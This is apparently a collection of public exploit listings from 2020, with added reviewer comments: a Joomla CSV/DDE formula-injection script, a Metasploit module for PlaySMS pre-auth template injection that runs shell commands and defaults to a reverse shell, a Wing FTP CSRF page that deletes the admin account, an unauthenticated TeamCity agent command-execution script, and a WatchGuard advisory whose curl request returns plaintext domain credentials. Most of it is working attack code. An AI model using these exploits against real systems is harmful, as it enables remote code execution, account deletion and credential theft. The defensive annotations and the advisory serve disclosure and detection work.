
  #!/usr/bin/python3
# Exploit Title: Joomla 3.9.0 < 3.9.7 - CSV Injection
# Date: 2020-03-10
# Vulnerability Authors: Jose Antonio Rodriguez Garcia and Phil Keeble (MWR InfoSecurity)
# Exploit Author: Abdullah - @i4bdullah
# Vendor Homepage: https://www.joomla.org/
# Software Link: https://downloads.joomla.org/cms/joomla3/3-9-5/Joomla_3-9-5-Stable-Full_Package.zip?format=zip
# Version: 3.9.0 < 3.9.7
# Tested on: Ubuntu 18.04 LTS and Windows 7
# CVE : CVE-2019-12765
#
# Defender's summary of what this script demonstrates: the public
# registration form accepts a display name that starts with "=" (a
# spreadsheet formula). The script only stores that value; the step where
# the stored name is later exported and evaluated is not shown on this
# page (the title calls it CSV injection, so presumably a CSV export
# opened in a spreadsheet -- not demonstrated here).
# Mitigation per the header: the affected range is 3.9.0 up to, but not
# including, 3.9.7. Detection: new user records whose name field begins
# with "=" or contains "cmd|".

import mechanize  # third-party (not standard library)
import sys

# Exactly one argument is expected: the base URL (scheme + host).
if (len(sys.argv) != 2):
    print(f'Usage: {sys.argv[0]} <Base URL>')
    print(f'Example: {sys.argv[0]} http://127.0.0.1 ')
    sys.exit(1)

base_url = sys.argv[1]
# Assumes Joomla lives under "/joomla" and that the registration menu item
# has Itemid=101 -- both are installation-specific (TODO confirm per target).
reg_url = f"{base_url}/joomla/index.php/component/users/?view=registration&Itemid=101"
# Never referenced below; kept as written by the author.
login_url = f"{base_url}/joomla/index.php?option=com_users"


def pwn(username: str = 'abdullah') -> None:
    """Submit the registration form with a formula string as the display name.

    Args:
        username: Joomla username for the account that is created.

    Side effects: opens the registration page, fills and submits the first
    form on it, prints progress, then terminates the process with
    ``sys.exit(0)`` -- this function never returns to its caller.
    """
    # Formula string stored verbatim in jform[name]; it looks like the
    # Excel DDE syntax, but nothing here evaluates it.
    payload = "=cmd|'/c calc.exe'!A1"
    print(f"Registering a new user with the name <{payload}>...")
    reg_form = mechanize.Browser()
    reg_form.set_handle_robots(False)  # do not honour robots.txt
    reg_form.open(reg_url)
    reg_form.select_form(nr=0)  # first form on the page; assumed to be the registration form
    reg_form.form['jform[name]'] = payload
    reg_form.form['jform[username]'] = username
    reg_form.form['jform[password1]'] = 'password'
    reg_form.form['jform[password2]'] = 'password'
    # NOTE(review): "[email protected]" looks like an e-mail-obfuscation
    # artifact of the page this was copied from rather than the author's
    # original value -- confirm against the upstream exploit listing.
    reg_form.form['jform[email1]'] = '[email protected]'
    reg_form.form['jform[email2]'] = '[email protected]'
    reg_form.submit()
    # The submit response is never inspected, so "successfully" only means
    # the request was sent, not that the registration was accepted.
    print("The exploit ran successfully.")
    print("Exiting...")
    sys.exit(0)


pwn()
  ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Reviewer summary (defender's view): the payload is submitted as the
# `username` field of a failed login and is later rendered through the
# application's template engine (see the author's description). Failed
# login requests whose username contains "{{" and backticks are the
# observable indicator; per the module metadata the fix is PlaySMS 1.4.3.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code Execution',
      'Description'    => %q{ This module exploits a Preauth Server-Side Template Injection leads remote code execution vulnerability in PlaySMS Before Version 1.4.3. This issue is caused by Double processes a server-side template by Custom PHP Template system called 'TPL'. which is used in PlaySMS template engine location src/Playsms/Tpl.php:_compile(). When Attacker supply username with a malicious payload and submit. This malicious payload first process by TPL and save the value in the current template after this value goes for the second process which result in code execution. The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection. This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine. },
      'Author'         => [
        'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
        'Lucas Rosevear' # Found and Initial PoC by NCC Groupd
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE','2020-8644'],
        ['URL',' https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ ']
      ],
      'DefaultOptions' => {
        'SSL' => false,
        'PAYLOAD' => 'cmd/unix/reverse_python'
      },
      'Privileged'     => false,
      'Platform'       => %w[unix linux],
      'Arch'           => ARCH_CMD,
      'Payload'        => {
        'Compat' => {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'python'
        }
      },
      'Targets'        => [
        [ 'PlaySMS Before 1.4.3', { } ],
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 05 2020'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']),
      ])
  end

  # Base path of the application, taken from the TARGETURI option.
  def uri
    return target_uri.path
  end

  # Fingerprint only: a GET to index.php answering 302 towards the
  # core_auth login route is reported as Appears. This identifies a
  # PlaySMS-like install; it does not distinguish patched from vulnerable
  # versions, so a "Safe" result here is not proof of a fixed deployment.
  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(uri, 'index.php')
      })
    rescue
      vprint_error('Unable to access the index.php file')
      return CheckCode::Unknown
    end

    if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
      return Exploit::CheckCode::Appears
    end

    return CheckCode::Safe
  end

  #Send Payload in Login Request
  # Fetches the login page to harvest the X-CSRF-Token and session cookies,
  # then POSTs the payload as the username. Returns the cookies on a 302
  # response; any other outcome aborts the module via fail_with.
  def login
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'index.php'),
      'method' => 'GET',
      'vars_get' => {
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login',
      }
    })

    # Grabbing CSRF token from body
    # NOTE(review): the character class includes a literal double quote, so
    # the capture is not limited to the token characters; it works as long
    # as the token is followed directly by '">'.
    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
    vprint_good("X-CSRF-Token for login : #{csrf}")
    cookies = res.get_cookies

    vprint_status('Trying to Send Payload in Username Field ......')

    #Encoded in base64 to avoid HTML TAGS which is filter by Application.
    evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64 -d |sh`}}"

    # Send Payload with cookies.
    # Parameter order is shuffled on every run, so signatures keyed on a
    # fixed parameter sequence will not match this module.
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'index.php'),
      'cookie' => cookies,
      'vars_get' => Hash[{
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login',
        'op' => 'login',
      }.to_a.shuffle],
      'vars_post' => Hash[{
        'X-CSRF-Token' => csrf,
        'username' => evil,
        'password' => ''
      }.to_a.shuffle],
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?

    # Request Status Check
    if res.code == 302
      print_good("Payload successfully Sent")
      return cookies
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes Wrong")
    end
  end

  # Triggers execution by re-requesting the login page with the same
  # session cookies; per the author's comment the last submitted username
  # is rendered at that point. The response is assigned but never read.
  def exploit
    cookies = login
    vprint_status("Cookies here : #{cookies}")

    # Execute Last Sent Username.
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'index.php'),
      'method' => 'GET',
      'cookie' => cookies,
      'vars_get' => {
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login',
      }
    })
  end
end

--
Touhid Shaikh
Exploit Researcher and Developer | Security Consultant
m: +91 7738794435
e: [email protected]
www.touhidshaikh.com
[image: Facebook icon] <https://www.facebook.com/tauheeds1> [image: LinkedIn icon] <https://www.linkedin.com/in/touhidshaikh22/> [image: Twitter icon] <https://twitter.com/touhidshaikh22> [image: Youtube icon] <https://www.youtube.com/touhidshaikh22>
The content of this email is confidential and intended for the recipient specified in message only. It is strictly forbidden to share any part of this message with any third party, without a written consent of the sender. If you received this message by mistake, please reply to this message and follow with its deletion, so that we can ensure such a mistake does not occur in the future.
  # Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation
# Date: 2020-03-10
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://www.wftpserver.com
# Version: v6.2.6
# Tested on: Windows 10

*Summary:*
An authenticated CSRF exists in web client and web administration of Wing FTP v6.2.6, a crafted HTML page could delete admin user from the application where as administration needs to re-install the program and add admin user again. Issue was patched in v6.2.7.

*Proof of concept:*
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://IP:5466/admin_delete_admin.html" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="r" value="0&#46;9219583354400562" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

*Patch (lua/cgiadmin.lua):*
URL: https://www.wftpserver.com/serverhistory.htm

-- Reviewer notes on the vendor's patched cgiadmin.lua excerpt below.
-- Only these functions are shown; incfiles, echo_out, c_GetAppPath,
-- strHead, strContent, urlparam, unescape, specialhtml_encode, _GET,
-- _POST, _COOKIE, _SESSION, _SESSION_ID, _SETCOOKIE and SessionModule are
-- defined elsewhere in the product and are used here as globals.
-- The CSRF-relevant logic is in init_get()/init_post(): when a session
-- cookie is present, the Referer header is compared against the Host
-- header and the request is aborted via exit() on mismatch.

local outfunc = "echo"

-- Escapes the template text s[i..f] so it can be emitted as a quoted
-- argument to outfunc (backslash, newline, quote and CR are escaped).
local function out (s, i, f)
  s = string.sub(s, i, f or -1)
  if s == "" then return s end
  s = string.gsub(s, "([\\\n\'])", "\\%1")
  s = string.gsub(s, "\r", "\\r")
  return string.format(" %s('%s'); ", outfunc, s)
end

-- Converts a page template into Lua source: literal text becomes
-- outfunc('...') calls, <??lua ... ??> / <?? ... ??> sections are inlined
-- as code, and "<??= expr ??>" becomes outfunc(expr).
local function translate (s)
  s = string.gsub(s, "<%%(.-)%%>", "<??lua %1 ??>")
  local res = {}
  local start = 1
  while true do
    local ip, fp, target, exp, code = string.find(s, "<%?%?(%w*)[ \t]*(=?)(.-)%?%?>", start)
    if not ip then break end
    table.insert(res, out(s, start, ip-1))
    if target ~= "" and target ~= "lua" then
      table.insert(res, out(s, ip, fp))
    else
      if exp == "=" then
        table.insert(res, string.format(" %s(%s);", outfunc, code))
      else
        table.insert(res, string.format(" %s ", code))
      end
    end
    start = fp + 1
  end
  table.insert(res, out(s, start))
  return table.concat(res)
end

-- Compiles translated template source with loadstring; the chunk runs in
-- include() below, so the template files themselves are executable code.
local function compile (src, chunkname)
  return loadstring(translate(src),chunkname)
end

-- Loads <app path>/webadmin/<filename> once per request, compiles it and
-- runs it under pcall. Errors raised by exit() ("exit function!") are
-- silently treated as normal termination; anything else is printed.
-- NOTE(review): filename is joined to the path without any normalisation
-- here; whether callers restrict it is not visible in this excerpt.
function include (filename, env)
  if incfiles[filename] == nil then
    incfiles[filename] = true;
    path = c_GetAppPath()
    path = path .. "/webadmin/"..filename
    local errstr = string.format("<b>The page '%s' does not exist!</b>",filename)
    local fh,_ = io.open (path)
    if not fh then
      echo_out = echo_out..errstr
      return
    end
    local src = fh:read("*a")
    fh:close()
    local prog = compile(src, path)
    local _env
    if env then
      _env = getfenv (prog)
      setfenv (prog, env)
    end
    local status,err = pcall(prog)
    if not status then
      if type(err) == "string" and not string.find(err,"exit function!") then
        print(string.format("some error in %s!",err))
      end
      return
    end
  end
end

-- Debug helper: prints a one-level description of any Lua value.
function var_dump(var)
  print("{")
  if type(var) == "string" or type(var) == "number" or type(var) == "boolean" or type(var) == "function" then
    print(var)
  elseif(type(var) == "thread") then
    print("thread")
  elseif(type(var) == "userdata") then
    print("userdata")
  elseif type(var) == "nil" then
    print("nil")
  elseif type(var) == "table" then
    for k,v in pairs(var) do
      if type(k) == "string" then k="'"..k.."'" end
      if(type(v) == "string") then
        print(k.."=>'"..v.."',")
      elseif(type(v) == "number" or type(v) == "boolean") then
        print(k.."=>"..tostring(v)..",")
      elseif(type(v) == "function") then
        print(k.."=>function,")
      elseif(type(v) == "thread") then
        print(k.."=>thread,")
      elseif(type(v) == "userdata") then
        print(k.."=>userdata,")
      elseif(type(v) == "nil") then
        print(k.."=>nil,")
      elseif(type(v) == "table") then
        print(k.."=>table,")
      else
        print(k.."=>object,")
      end
    end
  else
    print("object")
  end
  print("}")
end

-- Parses the query string into _GET.
-- Referer handling (only when a session cookie is present):
--   * Referer present and its host part (after a 7- or 8-character
--     scheme prefix, presumably "http://" / "https://") equals Host
--     -> parameters are accepted unchanged;
--   * Referer present but host differs -> exit(), request aborted;
--   * Referer absent -> MatchedReferer=false: "domain" is HTML-encoded
--     and every other parameter is dropped (the rawset is commented out).
-- NOTE(review): the comparison is a length-of-Host prefix check, not an
-- exact origin match.
function init_get()
  local MatchedReferer = true
  if _SESSION_ID ~= nil then
    local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)")
    if Referer ~= nil and Referer ~= "" then
      local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)")
      if Host ~= nil and Host ~= "" then
        if string.sub(Referer,8,string.len(Host)+7) == Host or string.sub(Referer,9,string.len(Host)+8) == Host then
          MatchedReferer = true
        else
          MatchedReferer = false
          exit()
        end
      end
    else
      MatchedReferer = false
    end
  end
  string.gsub (urlparam, "([^&=]+)=([^&=]*)&?", function (key, val)
    if key == "domain" then
      if MatchedReferer == true then
        rawset(_GET,key,val)
      else
        rawset(_GET,key,specialhtml_encode(val))
      end
    else
      if MatchedReferer == true then
        rawset(_GET,unescape(key),unescape(val))
      else
        --rawset(_GET,unescape(key),specialhtml_encode(unescape(val)))
      end
    end
  end )
end

-- Parses the request body into _POST, handling both multipart/form-data
-- and URL-encoded bodies. The Referer/Host check is the same as in
-- init_get() (see the notes there); it is duplicated rather than shared.
function init_post()
  local MatchedReferer = true
  if _SESSION_ID ~= nil then
    local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)")
    if Referer ~= nil and Referer ~= "" then
      local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)")
      if Host ~= nil and Host ~= "" then
        if string.sub(Referer,8,string.len(Host)+7) == Host or string.sub(Referer,9,string.len(Host)+8) == Host then
          MatchedReferer = true
        else
          MatchedReferer = false
          exit()
        end
      end
    else
      MatchedReferer = false
    end
  end
  if string.find(strHead,"[cC]ontent%-[tT]ype:%s?multipart/form%-data;%s?boundary=") then
    string.gsub (strContent, "[cC]ontent%-[dD]isposition:%s?form%-data;%s?name=\"([^\"\r\n]*)\"\r\n\r\n([^\r\n]*)\r\n", function (key, val)
      if key == "domain" then
        if MatchedReferer == true then
          rawset(_POST,key,val)
        else
          rawset(_POST,key,specialhtml_encode(val))
        end
      else
        if MatchedReferer == true then
          rawset(_POST,unescape(key),unescape(val))
        else
          --rawset(_POST,unescape(key),specialhtml_encode(unescape(val)))
        end
      end
    end )
  else
    string.gsub (strContent, "([^&=\r\n]+)=([^&=\r\n]*)&?", function (key, val)
      if key == "domain" then
        if MatchedReferer == true then
          rawset(_POST,key,val)
        else
          rawset(_POST,key,specialhtml_encode(val))
        end
      else
        if MatchedReferer == true then
          rawset(_POST,unescape(key),unescape(val))
        else
          --rawset(_POST,unescape(key),specialhtml_encode(unescape(val)))
        end
      end
    end )
  end
end

-- The admin session is identified solely by the UIDADMIN cookie.
function init_session()
  if _COOKIE["UIDADMIN"] ~= nil then
    _SESSION_ID = _COOKIE["UIDADMIN"]
    SessionModule.load(_SESSION_ID)
  end
end

-- Splits the Cookie header into _COOKIE (keys and values URL-unescaped).
function init_cookie()
  local cookiestr = string.match(strHead,"[cC]ookie:%s?(%s[^\r\n]*)")
  if cookiestr == nil or cookiestr == "" then return end
  string.gsub (cookiestr, "([^%s;=]+)=([^;=]*)[;%s]?", function (key, val)
    rawset(_COOKIE,unescape(key),unescape(val))
  end )
end

-- Appends a Set-Cookie header. UIDADMIN can never be set through this
-- path. expire_secs is accepted but ignored: the expiry is always one
-- year from now, so deletecookie() below does not actually expire anything.
function setcookie(name,value,expire_secs)
  if name == "UIDADMIN" then return end
  local expiretime = os.date("!%A, %d-%b-%Y %H:%M:%S GMT", os.time()+3600*24*365)
  _SETCOOKIE = _SETCOOKIE.."Set-Cookie: "..name.."="..value.."; expires="..expiretime.."\r\n"
  rawset(_COOKIE,name,value)
end

-- Reads a cookie; UIDADMIN is hidden from template code.
function getcookie(name)
  if name == "UIDADMIN" then return end
  return _COOKIE[name]
end

function deletecookie(name)
  setcookie(name,"",-10000000)
end

function deleteallcookies()
  for name,_ in pairs(_COOKIE) do
    deletecookie(name)
  end
end

-- Assigning _COOKIE[k] = v from template code emits a Set-Cookie header.
local cookie_metatable = {
  __newindex = function(t,k,v)
    setcookie(k,v,360000)
  end
}
setmetatable(_COOKIE,cookie_metatable)

-- Defined but not installed (the setmetatable call is commented out).
session_metatable = {
  __newindex = function(t,k,v)
    if type(v) ~= "table" then
      if k ~= nil then
        k = string.gsub(k,"'","")
        k = string.gsub(k,"\"","")
      end
      if v ~= nil then
        --v = string.gsub(v,"%[","")
        --v = string.gsub(v,"%]","")
      end
      rawset(_SESSION,k,v)
      SessionModule.save(_SESSION_ID)
    end
  end
}
--setmetatable(_SESSION,session_metatable)

-- Request setup order: cookies first so init_session() can find UIDADMIN,
-- then the parameter parsers, whose Referer check depends on _SESSION_ID.
function init_all()
  init_cookie()
  init_session()
  init_get()
  init_post()
end

function setContentType(typestr)
  _CONTENTTYPE = typestr
end

-- Aborts the current page; include() recognises this message and treats
-- it as a clean exit rather than an error.
function exit()
  error("exit function!")
end
  # Exploit Title: TeamCity Agent XML-RPC 10.0 - Remote Code Execution
# Date: 2020-03-20
# Exploit Author: Dylan Pindur
# Vendor Homepage: https://www.jetbrains.com/teamcity/
# Version: TeamCity < 10.0 (42002)
# Tested on: Windows 10 (x64)
# References:
# https://www.exploit-db.com/exploits/45917
# https://www.tenable.com/plugins/nessus/94675
#
# TeamCity Agents configured to use bidirectional communication allow the execution
# of commands sent to them via an XML-RPC endpoint.
#
# This script requires the following python modules are installed
# pip install requests
#
#!/usr/local/bin/python3
#
# Defender's summary: the script POSTs a single XML-RPC call,
# buildAgent.runBuild, directly to an agent's listening port with no
# authentication. The embedded build definition carries one simpleRunner
# step with use.custom.script=true, so the script.content value is run by
# the agent through "cmd /c" (Windows only, as written).
# Detection: "text/xml" POST bodies containing
# <methodName>buildAgent.runBuild</methodName> that reach an agent port
# from any source other than the TeamCity server.
# Mitigation per the header: fixed in TeamCity 10.0 (build 42002); the
# example port 9090 is the agent port used in the usage text below.

import requests  # third-party (not standard library)
import sys

# Four version-specific request templates. "{SCRIPT}" is substituted by
# prepare_payload(); everything else is fixed. Each is a single XML-RPC
# call whose parameter is an XStream-style <AgentBuild> document.
# region tc7
teamcity_7_req = """ <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>buildAgent.runBuild</methodName> <params> <param> <value> <![CDATA[ <AgentBuild> <myBuildId>123456</myBuildId> <myBuildTypeId>x</myBuildTypeId> <myCheckoutType>ON_AGENT</myCheckoutType> <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory> <myServerParameters class="tree-map"> <no-comparator/> <entry> <string>system.build.number</string> <string>0</string> </entry> </myServerParameters> <myVcsRootOldRevisions class="tree-map"> <no-comparator/> </myVcsRootOldRevisions> <myVcsRootCurrentRevisions class="tree-map"> <no-comparator/> </myVcsRootCurrentRevisions> <myAccessCode/> <myArtifactDependencies/> <myArtifactPaths/> <myBuildTypeOptions/> <myFullCheckoutReasons/> <myPersonalVcsChanges/> <myUserBuildParameters/> <myVcsChanges/> <myVcsRootEntries/> <myBuildRunners> <jetbrains.buildServer.agentServer.BuildRunnerData> <myRunType>simpleRunner</myRunType> <myRunnerName>x</myRunnerName> <myRunnerParameters class="tree-map"> <no-comparator/> <entry> <string>script.content</string> <string>{SCRIPT}</string> </entry> <entry> <string>teamcity.step.mode</string> <string>default</string> </entry> <entry> <string>use.custom.script</string> <string>true</string> </entry> </myRunnerParameters> <myServerParameters class="tree-map"> <no-comparator/> <entry> <string>teamcity.build.step.name</string> <string>x</string> </entry> </myServerParameters> </jetbrains.buildServer.agentServer.BuildRunnerData> </myBuildRunners> <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout> <myBuildFeatures/> </AgentBuild> ]]> </value> </param> </params> </methodCall> """.strip()
# endregion

# region tc8
teamcity_8_req = """ <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>buildAgent.runBuild</methodName> <params> <param> <value> <![CDATA[ <AgentBuild> <myBuildId>123456</myBuildId> <myBuildTypeId>x</myBuildTypeId> <myCheckoutType>ON_AGENT</myCheckoutType> <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory> <myServerParameters class="tree-map"> <entry> <string>system.build.number</string> <string>0</string> </entry> </myServerParameters> <myAccessCode/> <myArtifactDependencies/> <myArtifactPaths/> <myBuildTypeOptions/> <myFullCheckoutReasons/> <myPersonalVcsChanges/> <myUserBuildParameters/> <myVcsChanges/> <myVcsRootCurrentRevisions class="tree-map"/> <myVcsRootEntries/> <myVcsRootOldRevisions class="tree-map"/> <myBuildRunners> <jetbrains.buildServer.agentServer.BuildRunnerData> <myId>x</myId> <myIsDisabled>false</myIsDisabled> <myRunType>simpleRunner</myRunType> <myRunnerName>x</myRunnerName> <myChildren class="list"/> <myServerParameters class="tree-map"> <entry> <string>teamcity.build.step.name</string> <string>x</string> </entry> </myServerParameters> <myRunnerParameters class="tree-map"> <entry> <string>script.content</string> <string>{SCRIPT}</string> </entry> <entry> <string>teamcity.step.mode</string> <string>default</string> </entry> <entry> <string>use.custom.script</string> <string>true</string> </entry> </myRunnerParameters> </jetbrains.buildServer.agentServer.BuildRunnerData> </myBuildRunners> <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout> <myBuildFeatures/> </AgentBuild> ]]> </value> </param> </params> </methodCall> """.strip()
# endregion

# region tc9
teamcity_9_req = """ <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>buildAgent.runBuild</methodName> <params> <param> <value> <![CDATA[ <AgentBuild> <myBuildId>123456</myBuildId> <myBuildTypeId>x</myBuildTypeId> <myBuildTypeExternalId>x</myBuildTypeExternalId> <myCheckoutType>ON_AGENT</myCheckoutType> <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory> <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout> <myServerParameters class="StringTreeMap"> <k>system.build.number</k> <v>0</v> </myServerParameters> <myAccessCode/> <myArtifactDependencies/> <myArtifactPaths/> <myBuildFeatures/> <myBuildTypeOptions/> <myFullCheckoutReasons/> <myPersonalVcsChanges/> <myUserBuildParameters/> <myVcsChanges/> <myVcsRootCurrentRevisions class="tree-map"/> <myVcsRootEntries/> <myVcsRootOldRevisions class="tree-map"/> <myBuildRunners> <jetbrains.buildServer.agentServer.BuildRunnerData> <myId>x</myId> <myIsDisabled>false</myIsDisabled> <myRunType>simpleRunner</myRunType> <myRunnerName>x</myRunnerName> <myChildren class="list"/> <myServerParameters class="tree-map"> <entry> <string>teamcity.build.step.name</string> <string>x</string> </entry> </myServerParameters> <myRunnerParameters class="tree-map"> <entry> <string>script.content</string> <string>{SCRIPT}</string> </entry> <entry> <string>teamcity.step.mode</string> <string>default</string> </entry> <entry> <string>use.custom.script</string> <string>true</string> </entry> </myRunnerParameters> </jetbrains.buildServer.agentServer.BuildRunnerData> </myBuildRunners> </AgentBuild> ]]> </value> </param> </params> </methodCall> """.strip()
# endregion

# region tc10
teamcity_10_req = """ <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>buildAgent.runBuild</methodName> <params> <param> <value> <![CDATA[ <AgentBuild> <myBuildId>123456</myBuildId> <myBuildTypeId>x</myBuildTypeId> <myBuildTypeExternalId>x</myBuildTypeExternalId> <myCheckoutType>ON_AGENT</myCheckoutType> <myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout> <myVcsSettingsHashForAgentCheckout>123456</myVcsSettingsHashForAgentCheckout> <myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout> <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout> <myServerParameters class="StringTreeMap"> <k>system.build.number</k> <v>0</v> </myServerParameters> <myAccessCode/> <myArtifactDependencies/> <myArtifactPaths/> <myBuildFeatures/> <myBuildTypeOptions/> <myFullCheckoutReasons/> <myParametersSpecs class="StringTreeMap"/> <myPersonalVcsChanges/> <myUserBuildParameters/> <myVcsChanges/> <myVcsRootCurrentRevisions class="tree-map"/> <myVcsRootEntries/> <myVcsRootOldRevisions class="tree-map"/> <myBuildRunners> <jetbrains.buildServer.agentServer.BuildRunnerData> <myId>x</myId> <myIsDisabled>false</myIsDisabled> <myRunType>simpleRunner</myRunType> <myRunnerName>x</myRunnerName> <myChildren class="list"/> <myServerParameters class="tree-map"> <entry> <string>teamcity.build.step.name</string> <string>x</string> </entry> </myServerParameters> <myRunnerParameters class="tree-map"> <entry> <string>script.content</string> <string>{SCRIPT}</string> </entry> <entry> <string>teamcity.step.mode</string> <string>default</string> </entry> <entry> <string>use.custom.script</string> <string>true</string> </entry> </myRunnerParameters> </jetbrains.buildServer.agentServer.BuildRunnerData> </myBuildRunners> </AgentBuild> ]]> </value> </param> </params> </methodCall> """.strip()
# endregion


def prepare_payload(version: int, cmd: str) -> str:
    """Return the XML-RPC body for the given major version with cmd spliced in.

    Args:
        version: TeamCity major version; one of 7, 8, 9, 10.
        cmd: command line that replaces "{SCRIPT}" (always prefixed with
            "cmd /c", so the templates are Windows-specific as written).

    Returns:
        The selected template with the placeholder substituted.

    Raises:
        Exception: for any version without a template.
    """
    if version == 7:
        return teamcity_7_req.replace("{SCRIPT}", "cmd /c {}".format(cmd))
    elif version == 8:
        return teamcity_8_req.replace("{SCRIPT}", "cmd /c {}".format(cmd))
    elif version == 9:
        return teamcity_9_req.replace("{SCRIPT}", "cmd /c {}".format(cmd))
    elif version == 10:
        return teamcity_10_req.replace("{SCRIPT}", "cmd /c {}".format(cmd))
    else:
        raise Exception("No payload available for version {}".format(version))


def send_req(host: str, port: str, payload: str) -> None:
    """POST the XML-RPC body to http://host:port/ and print the outcome.

    Args:
        host: agent hostname or IP.
        port: agent port, already converted to a string by the caller.
        payload: request body from prepare_payload().

    Success is judged only by HTTP 200 plus the absence of the substring
    'fault' in the response text; nothing confirms the command ran.
    """
    headers = { "Content-Type": "text/xml" }
    url = "http://{}:{}/".format(host, port)  # plain HTTP, no TLS
    r = requests.post(url, headers=headers, data=payload)
    if r.status_code == 200 and 'fault' not in r.text:
        print('Command sent successfully')
    else:
        print('Command failed')
        print(r.text)


if len(sys.argv) != 4:
    print('[!] Missing arguments')
    print('[ ] Usage: {} <target> <port> <cmd>'.format(sys.argv[0]))
    print("[ ] E.g. {} 192.168.1.128 9090 'whoami > C:\\x.txt'".format(sys.argv[0]))
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])  # int() validates the argument; it is passed back as str below
cmd = sys.argv[3]

# Version is asked interactively rather than taken from argv.
version = input("Enter TeamCity version (7,8,9,10): ")
version = int(version.strip())  # ValueError on non-numeric input is not caught

if version not in [7, 8, 9, 10]:
    print("Please select a valid version (7,8,9,10)")
    sys.exit(1)

payload = prepare_payload(version, cmd)
send_req(target, str(port), payload)
  5. # Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure # Author: RedTeam Pentesting GmbH # Date: 2020-03-11 # Vendor: https://www.watchguard.com # Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html # CVE: N/A Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component RedTeam Pentesting discovered a credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext. Details ======= Product: WatchGuard Fireware AD Helper Component Affected Versions: 5.8.5.10233, < 5.8.5.10317 Fixed Versions: 5.8.5.10317 Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction ============ "Threat Detection and Response (TDR) is a cloud-based subscription service that integrates with your Firebox to minimize the consequences of data breaches and penetrations through early detection and automated remediation of security threats." "Threat Detection and Response includes the AD Helper component. If your network has an Active Directory server, you can install AD Helper to manage automated installation and updates of Host Sensors on your network." (from the vendor's homepage) More Details ============ By accessing the AD Helper's web interface, it was discovered that a call to an API endpoint is made, which responds with plaintext credentials to all configured domain controllers. 
There is no authentication needed to use the described interface and the installation instructions at [1] contain no indication of any way to configure access control. Proof of Concept ================ An HTTP GET request to the path "/domains/list" of the AD Helper API returns, among others, the plaintext credentials to all configured Windows domain controllers: ------------------------------------------------------------------------ $ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq . { "content": [ { "id": 1, "fullyQualifiedName": "example.com", "logonDomain": "example.com", "domainControllers": "dc1.example.com", "username": "[DOMAIN_USER]", "password": "[DOMAIN_PASSWORD]", "uuid": "[...]", "servers": [ { [...] } ] } ], "totalPages": 1, "totalElements": 1, "number": 0, "numberOfElements": 1 } ------------------------------------------------------------------------ The same request and its response can be observed when initially accessing the web interface. The discovered version of AD Helper responds with the following server banner: ------------------------------------------------------------------------ jetty(winstone-5.8.5.10233-9.4.12.v20180830) 